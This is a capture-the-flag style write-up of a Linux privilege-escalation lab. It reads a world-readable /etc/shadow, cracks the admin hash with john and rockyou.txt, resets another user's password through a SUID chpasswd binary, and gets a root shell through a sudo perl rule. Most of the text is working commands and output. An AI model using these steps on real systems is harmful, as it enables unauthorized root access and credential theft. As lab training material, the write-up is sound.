Multi User Escalation III linux-privilege-escalation | Level: Easy
The Challenge
So you’ve got a foothold on a regular user account on a Linux box? You’ve tried to escalate privileges to root but nothing seems to work? Keep in mind that many a time, you might have to escalate first to another non-root user with some privileges on the system and then try to escalate to root! Sometimes the user is the weakest part of the security chain! All required tools are available on the lab system.
Your mission is to get a root shell on the box!
Challenge Accepted
First we ls -la, nothing, so let’s try ls -la /. We see /wordlist and when we check it out we see a gunzipped rockyou.txt. I gunzip it and then know we have to bruteforce something, one of my first guesses was that it might be the shadow file, if I can read it then we know it’s the target.
student@attackdefense:/wordlist$ ls /wordlist/
mypasswd rockyou.txt
student@attackdefense:/wordlist$ cat /etc/shadow
root:*:17764:0:99999:7:::
daemon:*:17764:0:99999:7:::
bin:*:17764:0:99999:7:::
sys:*:17764:0:99999:7:::
sync:*:17764:0:99999:7:::
games:*:17764:0:99999:7:::
man:*:17764:0:99999:7:::
lp:*:17764:0:99999:7:::
mail:*:17764:0:99999:7:::
news:*:17764:0:99999:7:::
uucp:*:17764:0:99999:7:::
proxy:*:17764:0:99999:7:::
www-data:*:17764:0:99999:7:::
backup:*:17764:0:99999:7:::
list:*:17764:0:99999:7:::
irc:*:17764:0:99999:7:::
gnats:*:17764:0:99999:7:::
nobody:*:17764:0:99999:7:::
_apt:*:17764:0:99999:7:::
student:!:17800::::::
admin:$1$B86AnBa6$JkxAjd1kSxBIW/4FeNy191:17800::::::
teacher:!:17800::::::
We can cat /etc/shadow, so I check for a common tool that is to convert shadow file hashes into a format we can use with
student@attackdefense:/wordlist$ unshadow /etc/passwd /etc/shadow > crackthis
Now time to use john and provide rockyou.txt as our wordlist and crackthis as the hash to crack.
student@attackdefense:/wordlist$ john --wordlist=rockyou.txt -show crackthis
It worked, now we have the password!
student@attackdefense:/wordlist$ su admin
Password:
admin@attackdefense:/wordlist$ whoami
admin
Now we’re in, let’s look around. .sudo_as_admin_successful stands out but do does the SETUID chpasswd owned by root, let’s try that.
admin@attackdefense:~$ ls -la
total 28
drwxr-x— 1 admin admin 4096 Mar 28 10:24 .
drwxr-xr-x 1 root root 4096 Sep 26 2018 ..
-rw——- 1 admin admin 17 Mar 28 10:30 .bash_history
-rw-r–r– 1 root root 0 Sep 26 2018 .sudo_as_admin_successful
-rwsr-xr-x 1 root root 8568 Sep 26 2018 chpasswd
admin@attackdefense:~$ ./chpasswd root
Invalid User!
It was worth a try, right? Let’s see if we can find valid usernames…
admin@attackdefense:~$ strings chpasswd | grep "Invalid User" -A ...
student
teacher
admin
...
Great, we found some valid users, we have been both student and admin, let’s try to change teacher’s password…
admin@attackdefense:~$ ./chpasswd teacher
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
admin@attackdefense:~$ su teacher
Password:
It worked, first things first, sudo -l.
teacher@attackdefense:/home/admin$ sudo -l
User teacher may run the following commands on attackdefense:
(root) NOPASSWD: /usr/bin/perl
Awesome, we can run
teacher@attackdefense:/home/admin$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
# id
uid=0(root) gid=0(root) groups=0(root)
Game Over.